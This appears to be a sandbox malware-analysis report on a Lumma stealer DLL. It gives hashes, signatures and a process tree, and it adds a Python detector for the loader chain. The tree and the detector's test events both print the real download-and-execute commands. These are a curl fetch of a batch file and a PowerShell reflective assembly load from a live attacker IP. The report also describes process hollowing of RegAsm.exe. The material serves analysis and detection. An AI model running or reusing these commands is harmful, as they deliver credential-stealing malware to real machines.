Analysis
max time kernel: 94s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/01/2025, 18:41
Static task: static1
Behavioral task: behavioral1
Sample: b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
Resource: win7-20240903-en
General
Target: b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
Size: 80KB
MD5: 07fd51e1e8368144ea403137a671b84c
SHA1: b41a78c43c5bf58f6664cb455130c9501c370f05
SHA256: b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f
SHA512: 854a57be09cb09217d268f9e5c2d9ce5da8cbed1fa75c3ec38cc2f1b323377cdbd4db29687fa01e186a1cad6a2ee2e18f8645f98f551eeaa9805269a21354dd7
SSDEEP: 1536:Y2ShYtT4To+GdOfoPXRr9tXLtAuQeSVdJssWdcd7IW3+ZR+ueK:Y2z0To+GdlhrbwJJ7IW3+n+ue
Malware Config
Extracted
URL: http://147.45.44.131/infopage/ioubcs.exe
Extracted
Family: lumma
URL: https://factlosserk.click/api
Signatures
- Lumma family
- Blocklisted process makes network request (1 IoC)
  flow 15, PID 4104, powershell.exe
- Downloads MZ/PE file
  PID 4104, powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 4104 (powershell.exe) set thread context of PID 4976 (RegAsm.exe), procid_target 92
- System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by regsvr32.exe, cmd.exe, cmd.exe, powershell.exe, csc.exe, cvtres.exe, RegAsm.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 4104, powershell.exe (x2)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 4104, powershell.exe
- Suspicious use of WriteProcessMemory (30 IoCs)
  PID 2112 (regsvr32.exe) wrote to memory of PID 4980, procid_target 83 (x3)
  PID 4980 (regsvr32.exe) wrote to memory of PID 3512, procid_target 84 (x3)
  PID 3512 (cmd.exe) wrote to memory of PID 5032, procid_target 86 (x3)
  PID 3512 (cmd.exe) wrote to memory of PID 2936, procid_target 87 (x3)
  PID 2936 (cmd.exe) wrote to memory of PID 4104, procid_target 89 (x3)
  PID 4104 (powershell.exe) wrote to memory of PID 4696, procid_target 90 (x3)
  PID 4696 (csc.exe) wrote to memory of PID 2392, procid_target 91 (x3)
  PID 4104 (powershell.exe) wrote to memory of PID 4976, procid_target 92 (x9)
Processes
C:\Windows\system32\regsvr32.exe (PID 2112)
  command: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\regsvr32.exe (PID 4980, parent 2112)
    command: /s C:\Users\Admin\AppData\Local\Temp\b260f38480746bb3769dbbc23802b3207b093e552d61b3e787386b94b081e31f.dll
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 3512, parent 4980)
      command: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\curl.exe (PID 5032, parent 3512)
        command: curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat
      C:\Windows\SysWOW64\cmd.exe (PID 2936, parent 3512)
        command: C:\Windows\system32\cmd.exe /K AppS.bat
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4104, parent 2936)
          command: powershell -Command "$url = 'http://147.45.44.131/infopage/ioubcs.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 4696, parent 4104)
            command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccpzn4is\ccpzn4is.cmdline"
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 2392, parent 4696)
              command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8ACB.tmp" "c:\Users\Admin\AppData\Local\Temp\ccpzn4is\CSC9B274A1535D441B8828BEEB83A7F14A8.TMP"
              - System Location Discovery: System Language Discovery
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 4976, parent 4104)
            command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            - System Location Discovery: System Language Discovery
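Added example (not part of the tria.ge report and not the sample's code): a small process-tree detector for the loader chain shown above. It runs over constructed Sysmon-style process-creation events (pid, ppid, image, command line) that mirror the report's tree, plus one benign regsvr32 control event that must not fire; the field names, rule names and the `sample.dll` / `comlib.dll` paths are assumptions. The curl header value and both URLs are taken from the report's command lines so that the IoC extractor can be checked against them, including resolving the `$headerName` / `$headerValue` indirection the PowerShell stage uses.

```python
import re

# Header value copied from the report's command lines, used to build the sample events.
HEADER_VALUE = "qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq"
CURL_CMD = (f'curl -H "X-Special-Header: {HEADER_VALUE}" -o AppS.bat '
            "http://147.45.44.131/infopage/vsgqwn1qxS.bat")
PS_CMD = ("powershell -Command \"$url = 'http://147.45.44.131/infopage/ioubcs.exe'; "
          "$webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; "
          f"$headerValue = '{HEADER_VALUE}'; $webClient.Headers.Add($headerName, $headerValue); "
          "$fileBytes = $webClient.DownloadData($url); "
          "$assembly = [System.Reflection.Assembly]::Load($fileBytes); "
          "$entryPoint = $assembly.EntryPoint; "
          "if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }\"")
NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"

# Constructed Sysmon-style process-creation events mirroring the report's tree
# (field names are assumptions, not a real export). PID 7000 is a benign control.
EVENTS = [
    {"pid": 2112, "ppid": 1, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\sample.dll"},
    {"pid": 4980, "ppid": 2112, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": r"/s C:\Users\Admin\AppData\Local\Temp\sample.dll"},
    {"pid": 3512, "ppid": 4980, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & ' + CURL_CMD + " & start AppS.bat"},
    {"pid": 5032, "ppid": 3512, "image": r"C:\Windows\SysWOW64\curl.exe", "cmd": CURL_CMD},
    {"pid": 2936, "ppid": 3512, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r"C:\Windows\system32\cmd.exe /K AppS.bat"},
    {"pid": 4104, "ppid": 2936,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "cmd": PS_CMD},
    {"pid": 4696, "ppid": 4104, "image": NET + r"\csc.exe",
     "cmd": f'"{NET}\\csc.exe" /noconfig /fullpaths @"C:\\Users\\Admin\\AppData\\Local\\Temp\\x\\x.cmdline"'},
    {"pid": 4976, "ppid": 4104, "image": NET + r"\RegAsm.exe", "cmd": f'"{NET}\\RegAsm.exe"'},
    {"pid": 7000, "ppid": 1, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\Program Files\Vendor\comlib.dll"},
]

CURL_HEADER = re.compile(r'curl\b.*?-H\s+"([^:"]+):\s*([^"]+)".*?-o\s+(\S+\.bat)\s+(https?://\S+)', re.I)
REFLECTIVE_LOAD = re.compile(r"DownloadData\(.*?\[System\.Reflection\.Assembly\]::Load\(.*?EntryPoint")
URL_RE = re.compile(r"""https?://[^\s'"]+""")
PS_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")          # $name = 'literal'
PS_HEADER_ADD = re.compile(r"Headers\.Add\(\$(\w+),\s*\$(\w+)\)")  # Headers.Add($n, $v)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _by_pid(events):
    return {e["pid"]: e for e in events}


def ancestry(events, pid):
    """Image basenames from pid up to the root, pid's own image first."""
    table, chain, seen = _by_pid(events), [], set()
    while pid in table and pid not in seen:
        seen.add(pid)
        chain.append(basename(table[pid]["image"]))
        pid = table[pid]["ppid"]
    return chain


def powershell_headers(cmd):
    """Resolve the $name/$value literals feeding WebClient.Headers.Add($n, $v)."""
    literals = dict(PS_ASSIGN.findall(cmd))
    return {(literals.get(n, "$" + n), literals.get(v, "$" + v))
            for n, v in PS_HEADER_ADD.findall(cmd)}


def detect(events):
    """Apply the four chain rules; return (rule, pid) hits in event order."""
    table, hits = _by_pid(events), []
    for e in events:
        name = basename(e["image"])
        parent = table.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        # 1. A DLL host (regsvr32) spawning a command interpreter.
        if name == "cmd.exe" and pname == "regsvr32.exe":
            hits.append(("regsvr32_spawns_cmd", e["pid"]))
        # 2. curl with a custom header writing a .bat fetched over http.
        if name in ("cmd.exe", "curl.exe") and CURL_HEADER.search(e["cmd"]):
            hits.append(("curl_custom_header_bat_download", e["pid"]))
        # 3. PowerShell download-and-run-in-memory via Assembly.Load + EntryPoint.
        if name == "powershell.exe" and REFLECTIVE_LOAD.search(e["cmd"]):
            hits.append(("powershell_reflective_assembly_load", e["pid"]))
        # 4. Argument-less RegAsm.exe under PowerShell with regsvr32 upstream:
        #    the hollowing target the report's SetThreadContext signature points at.
        if (name == "regasm.exe" and pname == "powershell.exe"
                and "regsvr32.exe" in ancestry(events, e["pid"])
                and re.fullmatch(r'"?[^"]*regasm\.exe"?\s*', e["cmd"], re.I)):
            hits.append(("regasm_no_args_under_powershell", e["pid"]))
    return hits


def extract_iocs(events):
    """URLs and custom HTTP headers recoverable from the command lines."""
    urls, headers = set(), set()
    for e in events:
        urls.update(URL_RE.findall(e["cmd"]))
        m = CURL_HEADER.search(e["cmd"])
        if m:
            headers.add((m.group(1), m.group(2)))
        headers.update(powershell_headers(e["cmd"]))
    return {"urls": sorted(urls), "headers": sorted(headers)}


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40} pid={pid}")
    print(extract_iocs(EVENTS))
```

Rule 4 is the one worth keeping even when the rest of the chain is rewritten: an argument-less .NET utility (RegAsm.exe, and by the same logic RegSvcs.exe or MSBuild.exe) started by PowerShell is a process-hollowing target, and the report's own SetThreadContext and nine-fold WriteProcessMemory entries from PID 4104 into 4976 are what that rule is standing in for.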
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: 016b6fcfecdb1b5ed2c1ccf2c391a814
  SHA1: f4f99950557e15f0de8dfa8d2f98df994788d41c
  SHA256: 5b1d9a912ec8fabaf79700681567a3505f3e5cb641ba0f5b41179ef43e44a516
  SHA512: c01cd78d0f1d9567b82d5f50445d6b67dd16540e6d2a7de9c180ad3fcaabdf86e109c78cb12adc36b7f3395bdaa96cc3273b7b56ad66bff0ea12398cb0db762d
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 9KB
  MD5: af563fda59513de1cf9bd54c842930f5
  SHA1: bb0ccf2bfa7f3a6388e6e6105528a34a8d1b1fef
  SHA256: 34b6ad6b7dff40171dea8e08bfebcbfeeb809a063c0b51f296c39942dfea05f9
  SHA512: b2435a49e49ebfd9be6212163345668181776e123850000612f27cca84c22dc35a6bd29c1402631145e3e0f7214cbf86215da9a66a0e0e2cef9654ae4a52eb6b
- Filesize: 5KB
  MD5: 244582a493f376d9c0f5672292d11ff2
  SHA1: 95e5011b114869175aebca27f73b11a9b0a2360b
  SHA256: ed786fd429082e725242f54db70f1a249c8deb54acb404bf27581fb523915c87
  SHA512: 59e4943cddd994af1ff8f724eb83065abca723891ab250a3c0a047e612111329f20a2fdba8dafd587c8f638f192b91c2a97d48503df59d3bf6dc7aec766d0d41
- Filesize: 652B
  MD5: e68fd1932e84a119b2875f57b5403f16
  SHA1: a360ec1208a49b7d722b3b9d98a2dbf8ca9bea3b
  SHA256: 1baf0c41e97d6e57b3feac57efac872099c6fd1c2098eeaa0457ddc7df18d1da
  SHA512: fe7f730c3dfda414a2525489c8c01bc5e4da2cf4310904dfd4090f1105ed4bf6d0cd170b721a4d56b951bbadd63de9b0f721e539897421f514a9acfa85868f2e
- Filesize: 10KB
  MD5: 9a280bef5048674eed1b619db8e0c654
  SHA1: f849de0496358992d1c0d40562da1aaede680453
  SHA256: 84a03780f5ebbf7989a4741b7a51206ac0b64562f2164af7427b5e1dac885d30
  SHA512: 6a4a1dba810d56dd64238d90e927b048570dbea05ec453826c23d2e267bf960e533ff9446827cba458f7c564b036bbe42613d5d3d7b68dd084cf4a17b2d2be5f
- Filesize: 204B
  MD5: 5d29a30a35c631cf07f7c4b210c6792b
  SHA1: ebe0a3146c53df90a74f45bb865909083f38ad54
  SHA256: 40d19c7663f72a5c5908aff2d8e5e4abc641eb8041c7717ddd9d30be5126f89c
  SHA512: db82782b7d2a160a38e4e8bea2f30e211b42ca525841ff395f215221ad3955c6120e09e1a2fca7522db6f587ae1e2110ba710cf610a2de5234da32f777bcf799